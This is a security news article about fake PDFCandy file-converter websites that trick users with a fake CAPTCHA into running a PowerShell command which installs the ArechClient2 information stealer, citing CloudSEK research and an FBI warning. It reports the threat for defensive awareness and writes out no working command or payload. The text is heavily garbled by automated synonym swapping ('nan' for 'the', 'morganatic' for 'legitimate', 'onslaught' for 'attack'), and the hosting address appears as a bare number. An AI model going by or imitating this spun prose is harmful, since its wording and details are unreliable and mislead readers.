Fake Pdfcandy File Converter Websites Spread Malware

CloudSEK uncovers a blase malware run wherever attackers impersonate PDFCandy.com to administer nan ArechClient2 accusation stealer. Learn really this scam useful and really to protect yourself.

Cybersecurity researchers astatine CloudSEK person a caller run exploiting nan fame of PDFCandy.com, an online record conversion instrumentality utilized by complete 2 and a half cardinal people, including complete half a cardinal from India alone.

As per their research, shared pinch Hackread.com, attackers are distributing ArechClient2 malware to bargain backstage accusation for illustration browser usernames and passwords. It is simply a SectopRAT family malware progressive since 2019 and is dispersed done deceptive online advertizing via Google Ads aliases clone package updates.

Reportedly, attackers person created a clone PDF to DOCX converter that is akin to nan morganatic pdfcandy.com. They person gone to awesome lengths to transcript nan look and consciousness of nan existent website. Such arsenic they usage akin web addresses to instrumentality unsuspecting users and person “meticulously replicated nan personification interface of nan genuine level and registered similar-looking domain names to deceive users,” CloudSEK’s researchers noted successful nan blog post.

Once a personification lands connected 1 of these clone sites, they are instantly asked to upload a PDF record for conversion, playing connected a communal request of galore net users. It moreover shows a clone loading animation arsenic if a existent conversion is happening, astir apt to build trust.

Then, unexpectedly, it presents a CAPTCHA verification, akin to what morganatic websites usage for security. This marks a captious measurement successful nan onslaught wherever “social engineering transitions to strategy compromise,’ nan study reads. This intends nan onslaught relies connected manipulating really users typically interact pinch websites.

The Malicious Trap (Source: CloudSEK)

Introducing CAPTCHA serves 2 purposes: making nan clone tract look much existent and allowing users to click without thinking. Next, nan website instructs users to tally a bid utilizing Windows’ built-in instrumentality PowerShell, starring to a strategy compromise. The bid study reveals a bid of redirects, starting pinch an guiltless nexus and starring to a record named “adobe.zip,” hosted connected 1728611543, which has been flagged arsenic malicious by aggregate information services.

The record contains a files called “SoundBAND” pinch a vulnerable executable record called “audiobitexe.” The attacker launches a multi-stage onslaught utilizing a morganatic Windows programme and a Windows tool, launching ArechClient2 information-stealing malware.

Fake PDFCandy websites progressive successful nan scam (Screenshot: CloudSEK)

It is worthy noting that nan FBI warned connected March 17, 2025, astir malicious online record converters being utilized to administer harmful software, truthful this threat is not new.

“Cybercriminals crossed nan globe are utilizing immoderate type of free archive converter aliases downloader tool. This mightiness beryllium a website claiming to person 1 type of record to another, specified arsenic a .doc record to a .pdf file. It mightiness besides declare to harvester files, specified arsenic joining aggregate .jpg files into 1 .pdf file. The fishy programme mightiness declare to beryllium an MP3 aliases MP4 downloading tool,” nan agency explained.

To protect against specified threats, you should beryllium cautious erstwhile utilizing online record conversion services, verify website legitimacy earlier uploading files, salary attraction to URLs, and beryllium wary of unexpected prompts.